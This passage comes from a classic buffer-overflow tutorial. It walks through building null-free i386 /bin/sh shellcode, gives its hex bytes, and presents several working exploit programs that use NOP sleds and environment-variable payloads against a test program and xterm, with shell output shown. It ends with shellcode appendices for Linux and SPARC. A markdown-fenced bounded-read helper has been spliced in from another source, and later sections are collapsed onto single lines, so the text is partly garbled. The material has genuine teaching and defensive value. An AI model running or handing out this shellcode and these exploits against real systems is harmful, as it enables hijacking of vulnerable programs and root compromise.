        We load the address of name[] into the EAX register.

0x8000149:      pushl  %eax

        We push the address of name[] onto the stack.

0x800014a:      movl   0xfffffff8(%ebp),%eax

        We load the address of the string "/bin/sh" into the EAX register.

0x800014d:      pushl  %eax

        We push the address of the string "/bin/sh" onto the stack.

0x800014e:      call   0x80002bc <__execve>

        Call the library procedure execve().  The call instruction pushes the
        IP onto the stack.
------------------------------------------------------------------------------

   Now execve().  Keep in mind we are using an Intel-based Linux system.  The
syscall details will change from OS to OS, and from CPU to CPU.  Some will
pass the arguments on the stack, others in registers.  Some use a software
interrupt to jump to kernel mode, others use a far call.  Linux passes its
arguments to the system call in registers, and uses a software interrupt
to jump into kernel mode.
------------------------------------------------------------------------------
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx

        The procedure prelude.

0x80002c0 <__execve+4>: movl   $0xb,%eax

        Copy 0xb (11 decimal) into the EAX register.  This is the index into
        the syscall table.  11 is execve.

0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx

        Copy the address of "/bin/sh" into EBX.

0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx

        Copy the address of name[] into ECX.

0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx

        Copy the address of the null pointer into %edx.

0x80002ce <__execve+18>:        int    $0x80

        Change into kernel mode.
------------------------------------------------------------------------------

   So as we can see there is not much to the execve() system call.  All we
need to do is:

        a) Have the null terminated string "/bin/sh" somewhere in memory.
        b) Have the address of the string "/bin/sh" somewhere in memory
           followed by a null long word.
        c) Copy 0xb into the EAX register.
        d) Copy the address of the string "/bin/sh" into the EBX register.
        e) Copy the address of the address of the string "/bin/sh" into the
           ECX register.
        f) Copy the address of the null long word into the EDX register.
        g) Execute the int $0x80 instruction.

   But what if the execve() call fails for some reason?  The program will
continue fetching instructions from the stack, which may contain random data!
The program will most likely core dump.  We want the program to exit cleanly
if the execve syscall fails.  To accomplish this we must then add an exit
syscall after the execve syscall.  What does the exit syscall look like?
exit.c
------------------------------------------------------------------------------
#include <stdlib.h>

void main() {
        exit(0);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl  %ebp
0x800034d <_exit+1>:    movl   %esp,%ebp
0x800034f <_exit+3>:    pushl  %ebx
0x8000350 <_exit+4>:    movl   $0x1,%eax
0x8000355 <_exit+9>:    movl   0x8(%ebp),%ebx
0x8000358 <_exit+12>:   int    $0x80
0x800035a <_exit+14>:   movl   0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>:   movl   %ebp,%esp
0x800035f <_exit+19>:   popl   %ebp
0x8000360 <_exit+20>:   ret
0x8000361 <_exit+21>:   nop
0x8000362 <_exit+22>:   nop
0x8000363 <_exit+23>:   nop
End of assembler dump.
------------------------------------------------------------------------------

   The exit syscall will place 0x1 in EAX, place the exit code in EBX,
and execute "int 0x80".  That's it.  Most applications return 0 on exit to
indicate no errors.  We will place 0 in EBX.  Our list of steps is now:

        a) Have the null terminated string "/bin/sh" somewhere in memory.
        b) Have the address of the string "/bin/sh" somewhere in memory
           followed by a null long word.
        c) Copy 0xb into the EAX register.
        d) Copy the address of the string "/bin/sh" into the EBX register.
        e) Copy the address of the address of the string "/bin/sh" into the
           ECX register.
        f) Copy the address of the null long word into the EDX register.
        g) Execute the int $0x80 instruction.
        h) Copy 0x1 into the EAX register.
        i) Copy 0x0 into the EBX register.
        j) Execute the int $0x80 instruction.

   Trying to put this together in assembly language, placing the string
after the code, and remembering we will place the address of the string,
and null word after the array, we have:

------------------------------------------------------------------------------
        movl   string_addr,string_addr_addr
        movb   $0x0,null_byte_addr
        movl   $0x0,null_addr
        movl   $0xb,%eax
        movl   string_addr,%ebx
        leal   string_addr,%ecx
        leal   null_string,%edx
        int    $0x80
        movl   $0x1, %eax
        movl   $0x0, %ebx
        int    $0x80
        /bin/sh string goes here.
------------------------------------------------------------------------------

   The problem is that we don't know where in the memory space of the
program we are trying to exploit the code (and the string that follows
it) will be placed.  One way around it is to use a JMP, and a CALL
instruction.  The JMP and CALL instructions can use IP relative addressing,
which means we can jump to an offset from the current IP without needing
to know the exact address of where in memory we want to jump to.  If we place
a CALL instruction right before the "/bin/sh" string, and a JMP instruction
to it, the string's address will be pushed onto the stack as the return
address when CALL is executed.  All we need then is to copy the return
address into a register.  The CALL instruction can simply call the start of
our code above.
Assuming now that J stands for the JMP instruction, C for the CALL
instruction, and s for the string, the execution flow would now be:


bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|            |
           |||_____________||____________| (1)
       (2)  ||_____________||
             |______________| (3)
top of                                                            bottom of
stack                                                                 stack


   With these modifications, using indexed addressing, and writing down how
many bytes each instruction takes, our code looks like:

------------------------------------------------------------------------------
        jmp    offset-to-call           # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,array-offset(%esi)  # 3 bytes
        movb   $0x0,nullbyteoffset(%esi)# 4 bytes
        movl   $0x0,null-offset(%esi)   # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   array-offset(%esi),%ecx  # 3 bytes
        leal   null-offset(%esi),%edx   # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   offset-to-popl           # 5 bytes
        /bin/sh string goes here.
------------------------------------------------------------------------------

   Calculating the offsets from jmp to call, from call to popl, from
the string address to the array, and from the string address to the null
long word, we now have:

------------------------------------------------------------------------------
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string "/bin/sh"               # 8 bytes
------------------------------------------------------------------------------

   Looks good.  To make sure it works correctly we must compile it and run
it.  But there is a problem.
Our code modifies itself, but most operating systems mark code pages
read-only.  To get around this restriction we must place the code we wish to
execute in the stack or data segment, and transfer control to it.  To do so
we will place our code in a global array in the data segment.  We first need
a hex representation of the binary code.  Let's compile it first, and then
use gdb to obtain it.

shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
");
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130:      pushl  %ebp
0x8000131:      movl   %esp,%ebp
0x8000133:      jmp    0x800015f
0x8000135:      popl   %esi
0x8000136:      movl   %esi,0x8(%esi)
0x8000139:      movb   $0x0,0x7(%esi)
0x800013d:      movl   $0x0,0xc(%esi)
0x8000144:      movl   $0xb,%eax
0x8000149:      movl   %esi,%ebx
0x800014b:      leal   0x8(%esi),%ecx
0x800014e:      leal   0xc(%esi),%edx
0x8000151:      int    $0x80
0x8000153:      movl   $0x1,%eax
0x8000158:      movl   $0x0,%ebx
0x800015d:      int    $0x80
0x800015f:      call   0x8000135
0x8000164:      das
0x8000165:      boundl 0x6e(%ecx),%ebp
0x8000168:      das
0x8000169:      jae    0x80001d3 <__new_exitfn+55>
0x800016b:      addb   %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133:      0xeb
(gdb)
0x8000134:      0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------

testsc.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------

   It works!  But there is an obstacle.  In most cases we'll be trying to
overflow a character buffer.  As such, any null bytes in our shellcode will be
considered the end of the string, and the copy will be terminated.  There must
be no null bytes in the shellcode for the exploit to work.  Let's try to
eliminate those bytes (and at the same time make the code smaller).
           Problem instruction:                 Substitute with:
           --------------------------------------------------------
           movb   $0x0,0x7(%esi)                xorl   %eax,%eax
           movl   $0x0,0xc(%esi)                movb   %al,0x7(%esi)
                                                movl   %eax,0xc(%esi)
           --------------------------------------------------------
           movl   $0xb,%eax                     movb   $0xb,%al
           --------------------------------------------------------
           movl   $0x1, %eax                    xorl   %ebx,%ebx
           movl   $0x0, %ebx                    movl   %ebx,%eax
                                                inc    %eax
           --------------------------------------------------------

   Our improved code:

shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x1f                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        xorl   %eax,%eax                # 2 bytes
        movb   %al,0x7(%esi)            # 3 bytes
        movl   %eax,0xc(%esi)           # 3 bytes
        movb   $0xb,%al                 # 2 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        xorl   %ebx,%ebx                # 2 bytes
        movl   %ebx,%eax                # 2 bytes
        inc    %eax                     # 1 byte
        int    $0x80                    # 2 bytes
        call   -0x24                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
                                        # 46 bytes total
");
}
------------------------------------------------------------------------------

   And our new test program:

testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------


                              Writing an Exploit
                              ~~~~~~~~~~~~~~~~~~
                          (or how to mung the stack)
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~

   Let's try to pull all our pieces together.  We have the shellcode.
We know it must be part of the string which we'll use to overflow the buffer.
We know we must point the return address back into the buffer.  This example
will demonstrate these points:

overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;

  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exploit1 exploit1.c
[aleph1]$ ./exploit1
$ exit
exit
[aleph1]$
------------------------------------------------------------------------------

   What we have done above is fill the array large_string[] with the
address of buffer[], which is where our code will be.  Then we copy our
shellcode into the beginning of the large_string string.  strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located.  Once we reach the end of main and it tries to return, it
jumps to our code, and execs a shell.

   The problem we face when trying to overflow the buffer of another program
is figuring out at what address the buffer (and thus our code) will be.  The
answer is that for every program the stack will start at the same address.
Most programs do not push more than a few hundred or a few thousand bytes
onto the stack at any one time.  Therefore by knowing where the stack starts
we can try to guess where the buffer we are trying to overflow will be.
Here is a little program that will print its stack pointer:

sp.c
------------------------------------------------------------------------------
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}
void main() {
  printf("0x%x\n", get_sp());
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ ./sp
0x8000470
[aleph1]$
------------------------------------------------------------------------------

   Let's assume this is the program we are trying to overflow:

vulnerable.c
------------------------------------------------------------------------------
void main(int argc, char *argv[]) {
  char buffer[512];

  if (argc > 1)
    strcpy(buffer,argv[1]);
}
------------------------------------------------------------------------------

   We can create a program that takes as a parameter a buffer size, and an
offset from its own stack pointer (where we believe the buffer we want to
overflow may live).
We'll put the overflow string in an environment variable so it is easy to
manipulate:

exploit2.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

   Now we can try to guess what the buffer and offset should be:

------------------------------------------------------------------------------
[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------

   As we can see this is not an efficient process.
Trying to guess the offset even while knowing where the beginning of the
stack lives is nearly impossible.  We would need at best a hundred tries, and
at worst a couple of thousand.  The problem is we need to guess *exactly*
where the address of our code will start.  If we are off by one byte more or
less we will just get a segmentation violation or an illegal instruction.
One way to increase our chances is to pad the front of our overflow buffer
with NOP instructions.  Almost all processors have a NOP instruction that
performs a null operation.  It is usually used to delay execution for
purposes of timing.  We will take advantage of it and fill half of our
overflow buffer with them.  We will place our shellcode at the center, and
then follow it with the return addresses.  If we are lucky and the return
address points anywhere in the string of NOPs, they will just get executed
until they reach our code.  In the Intel architecture the NOP instruction is
one byte long and it translates to 0x90 in machine code.
Assuming the stack starts at address 0xFF, that S stands for shell code, and
that N stands for a NOP instruction, the new stack would look like this:


bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
                 ^                     |
                 |_____________________|
top of                                                            bottom of
stack                                                                 stack


   The new exploit is then:

exploit3.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

   A good selection for our buffer size is about 100 bytes more than the size
of the buffer we are trying to overflow.  This will place our code at the end
of the buffer we are trying to overflow, giving a lot of space for the NOPs,
but still overwriting the return address with the address we guessed.  The
buffer we are trying to overflow is 512 bytes long, so we'll use 612.
Let's try to overflow our test program with our new exploit:

------------------------------------------------------------------------------
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------

   Whoa!  First try!  This change has improved our chances a hundredfold.
Let's try it now on a real case of a buffer overflow.  We'll use for our
demonstration the buffer overflow in the Xt library.  For our example, we'll
use xterm (all programs linked with the Xt library are vulnerable).  You must
be running an X server and allow connections to it from the localhost.  Set
your DISPLAY variable accordingly.

------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit3 1124
Using address: 0xbffffdb4
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF ° óV ¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤ ...
^C
[aleph1]$ exit
[aleph1]$ ./exploit3 2148 100
Using address: 0xbffffd48
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF ° óV ¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ ...
Warning: some arguments in previous message were lost
Illegal instruction
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit4 2148 600
Using address: 0xbffffb54
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF ° óV ¤1¤Ø@¤èÜÿÿÿ/bin/shûÿ¿Tûÿ¿Tûÿ¿T ...
Warning: some arguments in previous message were lost
bash$
------------------------------------------------------------------------------

   Eureka!  Less than a dozen tries and we found the magic numbers.  If xterm
were installed suid root this would now be a root shell.


                            Small Buffer Overflows
                            ~~~~~~~~~~~~~~~~~~~~~~

   There will be times when the buffer you are trying to overflow is so
small that either the shellcode won't fit into it, and it will overwrite the
return address with instructions instead of the address of our code, or the
number of NOPs you can pad the front of the string with is so small that the
chances of guessing their address are minuscule.  To obtain a shell from
these programs we will have to go about it another way.  This particular
approach only works when you have access to the program's environment
variables.

   What we will do is place our shellcode in an environment variable, and
then overflow the buffer with the address of this variable in memory.  This
method also increases your chances of the exploit working, as you can make
the environment variable holding the shell code as large as you want.

   The environment variables are stored at the top of the stack when the
program is started; any modifications by setenv() are then allocated
elsewhere.  The stack at the beginning then looks like this:


      <strings><argv pointers>NULL<envp pointers>NULL<argc><argv><envp>

   Our new program will take an extra variable, the size of the variable
containing the shellcode and NOPs.
Our new exploit now looks like this: exploit4.c ------------------------------------------------------------------------------ #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); system("/bin/bash"); } ------------------------------------------------------------------------------ Lets try our new exploit with our vulnerable test program: ------------------------------------------------------------------------------ [aleph1]$ ./exploit4 768 Using address: 0xbffffdb0 [aleph1]$ ./vulnerable $RET $ ------------------------------------------------------------------------------ Works like a charm. 
Now let's try it on xterm:

------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit4 2148
Using address: 0xbffffdb0
[aleph1]$ /usr/X11R6/bin/xterm -fg $RET
Warning: Color name "°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿ [...]
Warning: some arguments in previous message were lost
$
------------------------------------------------------------------------------

   On the first try!  It has certainly increased our odds.  Depending on how
much environment data the exploit program has compared with the program you
are trying to exploit, the guessed address may be too low or too high.
Experiment with both positive and negative offsets.

Finding Buffer Overflows
~~~~~~~~~~~~~~~~~~~~~~~~

   As stated earlier, buffer overflows are the result of stuffing more
information into a buffer than it is meant to hold.  Since C does not have
any built-in bounds checking, overflows often manifest themselves as writing
past the end of a character array.  The standard C library provides a number
of functions for copying or appending strings that perform no boundary
checking.  They include: strcat(), strcpy(), sprintf(), and vsprintf().
These functions operate on null-terminated strings, and do not check for
overflow of the receiving string.  gets() is a function that reads a line
from stdin into a buffer until either a terminating newline or EOF.  It
performs no checks for buffer overflows.  The scanf() family of functions
can also be a problem if you are matching a sequence of non-white-space
characters (%s), or matching a non-empty sequence of characters from a
specified set (%[]), and the array pointed to by the char pointer is not
large enough to accept the whole sequence of characters, and you have not
defined the optional maximum field width.  If the target of any of these
functions is a buffer of static size, and its other argument was somehow
derived from user input, there is a good possibility that you might be able
to exploit a buffer overflow.

   Another usual programming construct we find is the use of a while loop to
read one character at a time into a buffer from stdin or some file until the
end of line, end of file, or some other delimiter is reached.  This type of
construct usually uses one of these functions: getc(), fgetc(), or getchar().
If there are no explicit checks for overflows in the while loop, such
programs are easily exploited.

   To conclude, grep(1) is your friend.  The sources for free operating
systems and their utilities are readily available.  This fact becomes quite
interesting once you realize that many commercial operating systems utilities
were derived from the same sources as the free ones.  Use the source d00d.
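
   The explicit overflow check that such a read loop needs can be sketched
as follows.  This is only a minimal illustration, not code from the article:
the helper name read_line_bounded() and its return convention are
assumptions made for this example.  It reads with getc(), as described
above, but stops storing characters once the buffer is full.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper (not part of the article): read one line from 'in'
 * into 'dst', storing at most cap-1 characters plus a terminating '\0'.
 * Characters that do not fit are read and discarded, so the next call
 * starts on a fresh line.  Returns the number of characters stored, or
 * -1 if end of file is reached before any character is read.
 */
int read_line_bounded(FILE *in, char *dst, size_t cap)
{
   size_t n = 0;
   int c;

   assert(in != NULL && dst != NULL && cap > 1);

   while ((c = getc(in)) != EOF && c != '\n')
   {
      if (n + 1 < cap)          /* the explicit overflow check */
         dst[n++] = (char)c;
      /* else: drop the character instead of writing past the end */
   }

   dst[n] = '\0';
   if (c == EOF && n == 0)
      return -1;
   return (int)n;
}
```

   A caller would pass sizeof(buf) as the capacity, for example
read_line_bounded(stdin, buf, sizeof(buf)), so the limit always matches the
buffer actually being filled.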
Appendix A - Shellcode for Different Operating Systems/Architectures ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ i386/Linux ------------------------------------------------------------------------------ jmp 0x1f popl %esi movl %esi,0x8(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) movb $0xb,%al movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 xorl %ebx,%ebx movl %ebx,%eax inc %eax int $0x80 call -0x24 .string \"/bin/sh\" ------------------------------------------------------------------------------ SPARC/Solaris ------------------------------------------------------------------------------ sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %g1 ta 8 xor %o7, %o7, %o0 mov 1, %g1 ta 8 ------------------------------------------------------------------------------ SPARC/SunOS ------------------------------------------------------------------------------ sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %g1 mov -0x1, %l5 ta %l5 + 1 xor %o7, %o7, %o0 mov 1, %g1 ta %l5 + 1 ------------------------------------------------------------------------------ Appendix B - Generic Buffer Overflow Program ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode.h ------------------------------------------------------------------------------ #if defined(__i386__) && defined(__linux__) #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } #elif defined(__sparc__) && defined(__sun__) && defined(__svr4__) #define NOP_SIZE 4 char 
